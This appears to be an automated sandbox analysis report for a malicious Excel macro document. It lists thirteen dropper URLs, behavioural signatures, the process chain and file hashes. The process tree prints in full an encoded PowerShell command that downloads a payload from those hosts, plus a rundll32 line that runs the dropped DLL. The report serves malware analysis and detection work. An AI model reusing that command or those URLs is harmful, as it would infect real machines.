Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/11/2024, 22:51

General

  • Target

    5dd7cf684929ca3a2dea93934e7685efa18394eb07b64fae4bf03e3239e3cdc9.xls

  • Size

    121KB

  • MD5

    2bf4037dc83d399f5533e984f6a235f0

  • SHA1

    4c047e262ebaa6971925b01d08097235124826e0

  • SHA256

    5dd7cf684929ca3a2dea93934e7685efa18394eb07b64fae4bf03e3239e3cdc9

  • SHA512

    f9f3cbb54d94312041b0e3c19e5ac1e401f9c7f7ca8e002a4d2ae92e70d34b603b7bba4238949ff25e44a74142672b3c67ba37adc55740f33a4f5e88c0812b88

  • SSDEEP

    3072:jlcKoSsxzNDZLDZjlbR868O8KlVH37kehvMqAPjxO5xyZUE5V5xtezEVg8/dgGBW:JcKoSsxzNDZLDZjlbR868O8KlVH37ken

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://alivesystems.com/eln-images/pm2rSsnVM/

exe.dropper

http://don-lee.com/_notes/U6H14DNA/

exe.dropper

http://mellow60s.com/Stanley_files/EFIqwZ183rfmd/

exe.dropper

http://pro-ficientllc.com/PDF_files/5A9W8/

exe.dropper

http://lost-earth.com/Black_and_White/ZW4rHEdD1vZX/

exe.dropper

http://creedmoorpartners.com/eln-images/wEYKd5KJZETheBswq/

exe.dropper

http://mattersoffact.com/cgi/E0C1vtSqt/

exe.dropper

http://pureplatinumband.com/Schedule/EW24AYJCvBpN8Gc/

exe.dropper

http://homehandyworks.com/eln-images/xFIDPfs4SS1yw7ghXXk/

exe.dropper

http://hi-techaudio.com/dir2021/g3d/

exe.dropper

http://roderickpowellentertainment.com/eln-images/OVOyN3y9/

exe.dropper

https://consciences.center/wp-includes/SkW2w/

exe.dropper

http://mag-designs.com/css/L3QKlr6iTzILVzbnC/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 14 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\5dd7cf684929ca3a2dea93934e7685efa18394eb07b64fae4bf03e3239e3cdc9.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3408
    • C:\Windows\SYSTEM32\wscript.exe
      wscript c:\programdata\tjspowj.vbs
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\programdata\uidpjewl.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4724
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -enc JABNAEoAWABkAGYAcwBoAEQAcgBmAEcAWgBzAGUAcwA0AD0AIgBoAHQAdABwADoALwAvAGEAbABpAHYAZQBzAHkAcwB0AGUAbQBzAC4AYwBvAG0ALwBlAGwAbgAtAGkAbQBhAGcAZQBzAC8AcABtADIAcgBTAHMAbgBWAE0ALwAsAGgAdAB0AHAAOgAvAC8AZABvAG4ALQBsAGUAZQAuAGMAbwBtAC8AXwBuAG8AdABlAHMALwBVADYASAAxADQARABOAEEALwAsAGgAdAB0AHAAOgAvAC8AbQBlAGwAbABvAHcANgAwAHMALgBjAG8AbQAvAFMAdABhAG4AbABlAHkAXwBmAGkAbABlAHMALwBFAEYASQBxAHcAWgAxADgAMwByAGYAbQBkAC8ALABoAHQAdABwADoALwAvAHAAcgBvAC0AZgBpAGMAaQBlAG4AdABsAGwAYwAuAGMAbwBtAC8AUABEAEYAXwBmAGkAbABlAHMALwA1AEEAOQBXADgALwAsAGgAdAB0AHAAOgAvAC8AbABvAHMAdAAtAGUAYQByAHQAaAAuAGMAbwBtAC8AQgBsAGEAYwBrAF8AYQBuAGQAXwBXAGgAaQB0AGUALwBaAFcANAByAEgARQBkAEQAMQB2AFoAWAAvACwAaAB0AHQAcAA6AC8ALwBjAHIAZQBlAGQAbQBvAG8AcgBwAGEAcgB0AG4AZQByAHMALgBjAG8AbQAvAGUAbABuAC0AaQBtAGEAZwBlAHMALwB3AEUAWQBLAGQANQBLAEoAWgBFAFQAaABlAEIAcwB3AHEALwAsAGgAdAB0AHAAOgAvAC8AbQBhAHQAdABlAHIAcwBvAGYAZgBhAGMAdAAuAGMAbwBtAC8AYwBnAGkALwBFADAAQwAxAHYAdABTAHEAdAAvACwAaAB0AHQAcAA6AC8ALwBwAHUAcgBlAHAAbABhAHQAaQBuAHUAbQBiAGEAbgBkAC4AYwBvAG0ALwBTAGMAaABlAGQAdQBsAGUALwBFAFcAMgA0AEEAWQBKAEMAdgBCAHAATgA4AEcAYwAvACwAaAB0AHQAcAA6AC8ALwBoAG8AbQBlAGgAYQBuAGQAeQB3AG8AcgBrAHMALgBjAG8AbQAvAGUAbABuAC0AaQBtAGEAZwBlAHMALwB4AEYASQBEAFAAZgBzADQAUwBTADEAeQB3ADcAZwBoAFgAWABrAC8ALABoAHQAdABwADoALwAvAGgAaQAtAHQAZQBjAGgAYQB1AGQAaQBvAC4AYwBvAG0ALwBkAGkAcgAyADAAMgAxAC8AZwAzAGQALwAsAGgAdAB0AHAAOgAvAC8AcgBvAGQAZQByAGkAYwBrAHAAbwB3AGUAbABsAGUAbgB0AGUAcgB0AGEAaQBuAG0AZQBuAHQALgBjAG8AbQAvAGUAbABuAC0AaQBtAGEAZwBlAHMALwBPAFYATwB5AE4AMwB5ADkALwAsAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBzAGMAaQBlAG4AYwBlAHMALgBjAGUAbgB0AGUAcgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFMAawBXADIAdwAvACwAaAB0AHQAcAA6AC8ALwBtAGEAZwAtAGQAZQBzAGkAZwBuAHMALgBjAG8AbQAvAGMAcwBzAC8ATAAzAFEASwBsAHIANgBpAFQAegBJAEwAVgB6AGIAbgBDAC8AIgAuAHMAUABMAEkAdAAoACIALAAiACkAOwAgAGYAbwBSAGUAQQBDAGgAKAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAGkATgAgACQATQBKAFgAZABmAHMAaABEAHIAZgBHAFoAcwBlAHMANAApACAAewAkAEcAdwBlAFkASAA1ADcAcwBlAGQAcwB3AGQAPQAoACIAYwBpAHUAdwBkADoAaQB1AHcAZABcAHAAcgBpAHUAdwBkAG8AZwBpAHUAdwBkAHIAYQBtAGkAdQB3AGQAZABhAHQAaQB1AHcAZABhAFwAcAB1AGkAaABvAHUAZAAuAGQAaQB1AHcAZABsAGkAdQB3AGQAbAAiACkALgByAGUAUABsAEEAQwBlACgAIgBpAHUAdwBkACIALAAiACIAKQA7AGkAbgBWAE8AawBlAC0AdwBlAEIAcgBFAHEAVQBlAHMAVAAgAC0AdQBSAEkAIAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAC0AbwBVAHQARgBJAGwAZQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAA7AGkARgAoAHQAZQBTAHQALQBwAEEAVABoACAAJABHAHcAZQBZAEgANQA3AHMAZQBkAHMAdwBkACkAewBpAGYAKAAoAGcARQB0AC0AaQB0AEUAbQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAApAC4AbABlAE4ARwB0AGgAIAAtAGcAZQAgADQANwA0ADMANgApAHsAYgBSAGUAYQBrADsAfQB9AH0A
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4888
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\puihoud.dll,tjpleowdsyf
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1620
        • \??\c:\windows\syswow64\rundll32.exe
          c:\windows\syswow64\rundll32.exe c:\programdata\puihoud.dll,tjpleowdsyf
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1648

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vgxu2pif.5s0.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

    Filesize

    1KB

    MD5

    00eaef9c49ed337f8ba246872da1c35d

    SHA1

    7399d3ea81ab012881c896c4879b446f94610e7b

    SHA256

    00f664373edb02541ee0f8edc0aa4bedc5fadf967590ee82e5da8d52791b2e54

    SHA512

    b9d71c0da3991d9f56731e3f4c2d518f59b55ac17ec6cb9a471efe034984d0d059ce631f4023cc0f61ccd2f6131e12558cd68f12affdba8682c6f46a5cfa2717

  • C:\programdata\uidpjewl.bat

    Filesize

    3KB

    MD5

    ee39cb33b8ab709959b2eb524c37e4df

    SHA1

    adb6601cc966c1fdd798945fd675f3611d5496e6

    SHA256

    c7bd5c4017c3c585280b5cb00dc96883f19f06ede2401c013142e7f8f46dd593

    SHA512

    74b6c0ef2bf6e4b6e1ee04063c1cffb265d66c572b6c8af536db40cc42eaa9cf833fd503aae9e0c577622ffca3d7a854989d271edbdbaa5b12238da17b5b9497

  • \??\c:\programdata\tjspowj.vbs

    Filesize

    689B

    MD5

    24a3cd3164d4db5a47b7a321aa51b0c6

    SHA1

    eb7277f82001af340b6404300465629b19811c3a

    SHA256

    5eed2cdac8033b25525f9240c83f793f12e606451298bb314ab4b40af62f08a2

    SHA512

    3ed236cd1bfa2283eec0443dcabd602fc100a2b4c38b60aa9ab99d769dc61f115032686b5572db16e98b9ecb44a94053eb9f0a9b46e94a854217311d0076c8e2

  • memory/3408-22-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-2-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

    Filesize

    64KB

  • memory/3408-20-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-19-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-15-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-21-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-4-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

    Filesize

    64KB

  • memory/3408-14-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-13-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-11-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-10-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-8-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-7-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-6-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-5-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

    Filesize

    64KB

  • memory/3408-3-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

    Filesize

    64KB

  • memory/3408-29-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-1-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

    Filesize

    64KB

  • memory/3408-17-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-0-0x00007FFC6DE0D000-0x00007FFC6DE0E000-memory.dmp

    Filesize

    4KB

  • memory/3408-118-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-101-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-51-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-87-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-18-0x00007FFC2BD00000-0x00007FFC2BD10000-memory.dmp

    Filesize

    64KB

  • memory/3408-16-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-12-0x00007FFC2BD00000-0x00007FFC2BD10000-memory.dmp

    Filesize

    64KB

  • memory/3408-9-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-201-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-186-0x00007FFC6DE0D000-0x00007FFC6DE0E000-memory.dmp

    Filesize

    4KB

  • memory/3408-187-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-188-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-189-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-191-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-193-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-196-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/3408-200-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/4888-184-0x00000270FF690000-0x00000270FFE36000-memory.dmp

    Filesize

    7.6MB

  • memory/4888-174-0x00000270FE910000-0x00000270FE932000-memory.dmp

    Filesize

    136KB